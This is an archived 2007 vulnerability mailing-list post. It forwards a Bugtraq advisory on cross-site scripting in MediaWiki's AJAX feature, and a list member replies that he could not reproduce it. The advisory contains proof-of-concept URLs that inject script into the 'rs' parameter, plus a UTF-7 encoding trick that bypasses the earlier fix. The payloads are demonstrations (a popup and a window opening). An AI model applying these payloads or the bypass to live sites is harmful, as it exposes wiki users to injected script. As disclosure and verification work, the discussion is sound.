[VIM] [unsure] MediaWiki Cross-site Scripting

Sullo sullo at cirt.net
Tue Feb 20 19:09:47 EST 2007


$wgUseAjax is off by default--in fact in my install I don't even have
that in the config file.

I didn't try very hard, but I couldn't get it to work either (after
turning wgUseAjax on).


Noam Rathaus wrote:
> Anyone able to confirm this? I can't.
>
> ----------  Forwarded Message  ----------
>
> Subject: MediaWiki Cross-site Scripting
> Date: Tuesday 20 February 2007 06:29
> From: eyal at bugsec.com
> To: bugtraq at securityfocus.com
>
> MediaWiki Cross-site Scripting
>
> Vulnerabilities.
>
>
> Date:
> 18/02/2007
>
> Vendor:
> MediaWiki
>
> Vulnerable versions:
> MediaWiki 1.9.2 (latest) and below.
>
> Description:
> MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting
>  attack by expliting the experimental AJAX features, if enabled (default).
>  This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1,
>  1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note:
>  browsers encoding auto-detection has to be enabled for successful
>  explitation.
>
>
> Proof-of-concept:
> http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
> UTF-7 XSS in post 1.8.2 versions.
>
> Examples:
> v1.8.2 and below:
> http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://w
> ww.bugsec.com')%3C/script%3E v1.8.3 - v1.9.2
> http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http
> ://www.bugsec.com');+ADw-/SCRIPT+AD4-
>  http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%5
> 4%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%
> 43%52%49%50%54%2B%41%44%34%2D (URL Encoded)
>
>
> Credit:
> Moshe BA from BugSec
> Tel:+972-3-9622655
> Email: Info [^A-t] BugSec \*D.O.T*\ com
> BugSec LTD. - www.BugSec.com
> http://www.bugsec.com/articles.php?Security=24
>
> -------------------------------------------------------
>
>   


-- 

http://www.cirt.net/      |     http://www.osvdb.org/



More information about the VIM mailing list